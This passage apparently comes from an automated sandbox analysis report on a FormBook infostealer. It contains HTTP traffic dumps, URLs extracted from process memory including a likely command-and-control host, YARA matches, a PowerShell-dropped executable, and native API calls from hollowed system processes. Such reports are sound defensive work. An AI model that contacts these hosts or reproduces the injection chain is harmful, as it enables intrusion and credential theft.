75 64 46 72 6f 6e 74 2c 20 79 6f 75 20 63 61 6e 20 66 69 6e 64 20 73 74 65 70 73 20 74 6f 20 74 72 6f 75 62 6c 65 73 68 6f 6f 74 20 61 6e 64 20 68 65 6c 70 20 70 72 65 76 65 6e 74 20 74 68 69 73 20 65 72 72 6f 72 20 62 79 20 72 65 76 69 65 77 69 6e 67 20 74 68 65 20 43 6c 6f 75 64 46 72 6f 6e 74 20 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 0a 3c 42 52 20 63 6c 65 61 72 3d 22 61 6c 6c 22 3e 0a 3c 48 52 20 6e 6f 73 68 61 64 65 20 73 69 7a 65 3d 22 31 70 78 22 3e 0a 3c 50 52 45 3e 0a 47 65 6e 65 72 61 74 65 64 20 62 79 20 63 6c 6f 75 64 66 72 6f 6e 74 20 28 43 6c 6f 75 64 46 72 6f 6e 74 29 0a 52 65 71 75 65 73 74 20 49 44 3a 20 4c 74 47 47 4b 52 69 39 4e 71 65 52 6b 32 42 36 66 78 50 69 74 53 47 6a 79 6f 78 39 4f 42 44 78 4e 6b 4e 6f 4c 63 4a 69 53 45 52 6a 49 6b 58 38 36 4a 45 48 30 51 3d 3d 0a 3c 2f 50 52 45 3e 0a 3c 41
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Apr 2025 11:57:46 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xZ%2F%2Bo%2Bdht52xMQVoILd0ex25iR8zK%2Fyg5PeosFjGncS%2F%2BllSmjfsfptRy6S%2FU4xs0Enen2Q8l8W1tz1l14xl9RR5dXXcH2bxIKSMWt0gZLi1medYaCle8M9Kavka03r6u2Y7"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 930b44687b3d1d7a-ATLContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=110712&min_rtt=110712&rtt_var=55356&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=666&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a3
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Apr 2025 11:57:49 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=59ah9w6l4YM%2F54AhnL2bmUUmpfDgM4TrBlmZkva8zX%2FsmkIxV1roLoUTeoikt4A1Lo%2F%2FHMKxSLJlEawkFf299y6wOoN43JrrrAEaN4FAxNQn9Y79lD2x%2BFBcpa0MgYw2vE5h"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 930b447a8b2444d1-ATLContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=103369&min_rtt=103369&rtt_var=51684&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=686&delivery_rate=0&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a3
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Apr 2025 11:57:51 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xci%2FvFrG4preUKMzedycrQpQw6nWtau2orB66c%2FGhMhfqcMwWj8JJooZ0useqNDbnmjo44HP57smLA25P1H4bSwnXOFQwSZfyc5DUs8zSq%2BhiYROWBIVoS0%2FdiU0WAyjRdM1"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 930b448bbd40677f-ATLContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=102088&min_rtt=102088&rtt_var=51044&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=678&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a3
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Apr 2025 11:57:54 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w51QY%2FErqxM%2BjhG3h33Nlur4djxBYf51%2FBbT2XFf8RSD1YsSpyDBUCan8VrM2nACVYMzgQhNohauAUltwY6kFR4uMxrC%2B2s%2BcORhO2wx%2F8%2B1Zv5dRNfnSLMFApwVJeisXQqZ"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 930b449cbbe4bade-ATLalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=103345&min_rtt=103345&rtt_var=51672&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=415&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 15 Apr 2025 11:58:29 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "6741d1c9-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 15 Apr 2025 11:58:32 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "6741d1c9-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 15 Apr 2025 11:58:35 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "6741d1c9-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 15 Apr 2025 11:58:38 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "6741d1c9-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Source: svchost.exe, 00000005.00000002.2815835187.000002AF5F400000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: qmgr.db.5.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.5.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.5.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.5.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.5.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.5.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.5.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000000.00000002.872345900.0000000005D87000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.862471082.0000000004E76000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.862471082.0000000004D21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: z3FgtAArgRVFoLlwLoetbjM.exe, 0000000E.00000002.3290853194.0000000004D0A000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.99fxz.net
Source: z3FgtAArgRVFoLlwLoetbjM.exe, 0000000E.00000002.3290853194.0000000004D0A000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.99fxz.net/2inw/
Source: powershell.exe, 00000000.00000002.862471082.0000000004E76000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: ipconfig.exe, 00000007.00000002.3291683618.00000000078FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org?q=
Source: powershell.exe, 00000000.00000002.862471082.0000000004D21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lBJr
Source: ipconfig.exe, 00000007.00000002.3291683618.00000000078FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: ipconfig.exe, 00000007.00000002.3291683618.00000000078FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: ipconfig.exe, 00000007.00000002.3291683618.00000000078FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: powershell.exe, 00000000.00000002.872345900.0000000005D87000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.872345900.0000000005D87000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.872345900.0000000005D87000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: ipconfig.exe, 00000007.00000002.3291683618.00000000078FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/?q=
Source: ipconfig.exe, 00000007.00000002.3291683618.00000000078FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: ipconfig.exe, 00000007.00000002.3291683618.00000000078FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtabv20
Source: edb.log.5.dr	String found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
Source: svchost.exe, 00000005.00000003.1203646753.000002AF5F600000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2/C:
Source: ipconfig.exe, 00000007.00000002.3291683618.00000000078FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gemini.google.com/app?q=
Source: powershell.exe, 00000000.00000002.862471082.0000000004E76000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: ipconfig.exe, 00000007.00000002.3287297366.00000000028F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: ipconfig.exe, 00000007.00000002.3287297366.0000000002922000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: ipconfig.exe, 00000007.00000003.1496890308.00000000078DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
Source: ipconfig.exe, 00000007.00000002.3287297366.00000000028F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: ipconfig.exe, 00000007.00000002.3287297366.00000000028F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: ipconfig.exe, 00000007.00000002.3287297366.00000000028F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: ipconfig.exe, 00000007.00000002.3287297366.00000000028F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: powershell.exe, 00000000.00000002.872345900.0000000005D87000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: ipconfig.exe, 00000007.00000002.3289845544.0000000004746000.00000004.10000000.00040000.00000000.sdmp, ipconfig.exe, 00000007.00000002.3291574027.0000000005EB0000.00000004.00000800.00020000.00000000.sdmp, z3FgtAArgRVFoLlwLoetbjM.exe, 0000000E.00000002.3289268340.0000000003A76000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://whois.gandi.net/en/results?search=curiosa.news
Source: ipconfig.exe, 00000007.00000002.3289845544.0000000003DDA000.00000004.10000000.00040000.00000000.sdmp, z3FgtAArgRVFoLlwLoetbjM.exe, 0000000E.00000002.3289268340.000000000310A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.bigcommerce.com/q2xw/?E8z8gxs=15Gtp7LARpLkoK5DJR0Mt5z17ZiWNbMYjPbCI8andccp0Q9jonZuAf6DNX
Source: ipconfig.exe, 00000007.00000002.3291683618.00000000078FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/v20w
Source: ipconfig.exe, 00000007.00000002.3289845544.0000000004746000.00000004.10000000.00040000.00000000.sdmp, ipconfig.exe, 00000007.00000002.3291574027.0000000005EB0000.00000004.00000800.00020000.00000000.sdmp, z3FgtAArgRVFoLlwLoetbjM.exe, 0000000E.00000002.3289268340.0000000003A76000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.gandi.net/en/domain
Source: ipconfig.exe, 00000007.00000002.3291683618.00000000078FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3288857339.0000000002B20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1311351646.0000000002EE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1310421003.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3288971059.0000000002BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3286966765.0000000002680000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1313188653.0000000003390000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3289053640.0000000002650000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: Process Memory Space: powershell.exe PID: 7068, type: MEMORYSTR

Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

PE file contains section with special chars

Source: aUwuTvOs.exe.0.dr

Static PE information: section name: ;Ld|#

PE file has nameless sections

Source: aUwuTvOs.exe.0.dr

Static PE information: section name:

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\aUwuTvOs.exe

Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0042CA23 NtClose,	3_2_0042CA23
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040ACC6 NtDelayExecution,	3_2_0040ACC6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_030B2B60 NtClose,LdrInitializeThunk,	3_2_030B2B60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_030B2DF0 NtQuerySystemInformation,LdrInitializeThunk,	3_2_030B2DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_030B2C70 NtFreeVirtualMemory,LdrInitializeThunk,	3_2_030B2C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_030B35C0 NtCreateMutant,LdrInitializeThunk,	3_2_030B35C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_030B4340 NtSetContextThread,	3_2_030B4340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_030B4650 NtSuspendThread,	3_2_030B4650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_030B2B80 NtQueryInformationFile,	3_2_030B2B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_030B2BA0 NtEnumerateValueKey,	3_2_030B2BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_030B2BE0 NtQueryValueKey,	3_2_030B2BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_030B2BF0 NtAllocateVirtualMemory,	3_2_030B2BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_030B2AB0 NtWaitForSingleObject,	3_2_030B2AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_030B2AD0 NtReadFile,	3_2_030B2AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_030B2AF0 NtWriteFile,	3_2_030B2AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_030B2F30 NtCreateSection,	3_2_030B2F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_030B2F60 NtCreateProcessEx,	3_2_030B2F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_030B2F90 NtProtectVirtualMemory,	3_2_030B2F90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_030B2FA0 NtQuerySection,	3_2_030B2FA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_030B2FB0 NtResumeThread,	3_2_030B2FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_030B2FE0 NtCreateFile,	3_2_030B2FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_030B2E30 NtWriteVirtualMemory,	3_2_030B2E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_030B2E80 NtReadVirtualMemory,	3_2_030B2E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_030B2EA0 NtAdjustPrivilegesToken,	3_2_030B2EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_030B2EE0 NtQueueApcThread,	3_2_030B2EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_030B2D00 NtSetInformationFile,	3_2_030B2D00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_030B2D10 NtMapViewOfSection,	3_2_030B2D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_030B2D30 NtUnmapViewOfSection,	3_2_030B2D30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_030B2DB0 NtEnumerateKey,	3_2_030B2DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_030B2DD0 NtDelayExecution,	3_2_030B2DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_030B2C00 NtQueryInformationProcess,	3_2_030B2C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_030B2C60 NtCreateKey,	3_2_030B2C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_030B2CA0 NtQueryInformationToken,	3_2_030B2CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_030B2CC0 NtQueryVirtualMemory,	3_2_030B2CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_030B2CF0 NtOpenProcess,	3_2_030B2CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_030B3010 NtOpenDirectoryObject,	3_2_030B3010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_030B3090 NtSetValueKey,	3_2_030B3090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_030B39B0 NtGetContextThread,	3_2_030B39B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_030B3D10 NtOpenProcessToken,	3_2_030B3D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_030B3D70 NtOpenThread,	3_2_030B3D70
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02F84340 NtSetContextThread,LdrInitializeThunk,	7_2_02F84340
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02F84650 NtSuspendThread,LdrInitializeThunk,	7_2_02F84650
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02F82AF0 NtWriteFile,LdrInitializeThunk,	7_2_02F82AF0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02F82AD0 NtReadFile,LdrInitializeThunk,	7_2_02F82AD0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02F82B60 NtClose,LdrInitializeThunk,	7_2_02F82B60
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02F82EE0 NtQueueApcThread,LdrInitializeThunk,	7_2_02F82EE0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02F82FE0 NtCreateFile,LdrInitializeThunk,	7_2_02F82FE0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02F82FB0 NtResumeThread,LdrInitializeThunk,	7_2_02F82FB0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02F82F30 NtCreateSection,LdrInitializeThunk,	7_2_02F82F30
